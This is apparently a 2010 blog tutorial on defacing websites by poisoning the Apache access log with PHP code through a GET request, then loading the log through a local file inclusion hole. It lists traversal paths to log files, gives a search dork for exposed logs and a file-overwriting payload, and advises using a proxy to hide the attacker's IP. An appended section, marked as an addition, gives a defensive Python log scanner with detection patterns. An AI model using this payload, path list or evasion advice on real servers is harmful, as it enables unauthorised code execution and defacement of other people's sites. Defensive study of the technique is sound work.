Monday, June 14, 2010

defacing when access.log is accessible

Note: This tutorial is written for educational purposes only and I take no responsibility for any consequences you suffer for executing this.

I have tested it on WampServer (Apache version 2.2.11; I don't know about others). So, here I am going to show how we can change/deface any page on the server if the access log is accessible.

How to access the access.log?
For that, you need to find an LFI vulnerability on the target site, and through that LFI you can include the access log. Here are some probable locations of access.log:
../apache/logs/access.log
../../apache/logs/access.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
Or simply use the dork (inurl:access.log), and you'll be surprised to see how many logs are at hand!

Ok, so moving on...

If you find a website with access.log accessible, follow these steps.

Make the following GET request to the website by means of telnet or anything else you wish.

GET /<*?php $vips='---DEFACED---'; $fp = fopen('--LOCATION OF THE WEBPAGE FROM LOG--', 'w'); fputs($fp, $vips); fclose($fp); ?*> HTTP/1.1

(remove the stars *)

But before making this GET request, you need to make some changes to it. (Double quotes in the GET request may be escaped before logging, so I am not using them here.)
---DEFACED--- : replace this with the HTML code that will be placed as the defacement.
--LOCATION OF THE WEBPAGE FROM LOG-- : this is the location of the webpage relative to the log. For example, if the log is in the directory 'logs' and the webpage to deface is in the directory 'pages', and both are in the directory 'web', then this value will be '../pages/index.htm', where index.htm is the name of the page to deface.

After making these changes, make the GET request to the website.

Here is what we have done: we have injected PHP code into access.log. What the PHP code does is change the content of index.htm to the HTML content we provided. But this will happen only when access.log is actually opened. So, now go to the LFI page and include access.log from there, or open the direct link to the log that you may have found from the dork.
The size of access.log may be huge depending on the popularity of the website, but keep it loading. After some time, when our malicious GET request is loaded, the PHP code will be executed and, if successful, we will see the defaced page. Be sure to use a proxy! Your IP address will be easily logged.
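From the defender's side, the two steps above leave two distinct traces in the same log: a request carrying a PHP open tag (the poisoning) and a request whose path traverses to a log file name (the include). The following Python scanner is an added example and not part of the original post; it parses Apache common/combined-format lines (handling the escaped quotes the post mentions), URL-decodes them, and flags both patterns over a small constructed sample.

```python
import re
from urllib.parse import unquote

# Apache common/combined log line. Apache writes a literal quote in the
# request as \" (as the post notes), so the request field admits \" inside.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# PHP open tag (<?php, <?=, or bare <?) in any logged field: code has been
# planted that runs if a PHP script ever includes this log.
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=|\s)', re.IGNORECASE)
# Traversal that ends at an Apache log file name: an LFI steered at the log.
LOG_TRAVERSAL_RE = re.compile(r'\.\./.*(?:access|error)[._]?log', re.IGNORECASE)

def classify(line):
    """Return alert tags for one access-log line ([] when it looks clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    alerts = []
    if PHP_TAG_RE.search(unquote(line)):                  # decode %3C%3Fphp etc.
        alerts.append("php_tag_in_log")
    if LOG_TRAVERSAL_RE.search(unquote(m.group("req"))):  # %2e%2e%2f -> ../
        alerts.append("traversal_to_log_file")
    return alerts

def scan(lines):
    """Return (line number, client ip, tags) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        tags = classify(line)
        if tags:
            m = LOG_RE.match(line)
            hits.append((n, m.group("ip") if m else "?", tags))
    return hits

# Constructed sample (RFC 5737 addresses, made-up timestamps), not a real log.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jun/2010:10:02:11 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Jun/2010:10:03:40 +0000] "GET /<?php echo \'poisoned\'; ?> HTTP/1.1" 404 208 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Jun/2010:10:04:02 +0000] "GET /index.php?page=../../../var/log/apache2/access.log HTTP/1.1" 200 98123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Jun/2010:10:05:13 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fapache%2flogs%2faccess.log HTTP/1.1" 200 98345 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Jun/2010:10:06:00 +0000] "GET /search?q=\\"quoted\\" HTTP/1.1" 200 1500 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, ip, tags in scan(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(tags)}")
```

A traversal hit followed by a large 200 response body is the strongest signal that the log was actually served; keeping logs outside the web root and never passing user-controlled paths to include() closes both halves of the technique.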
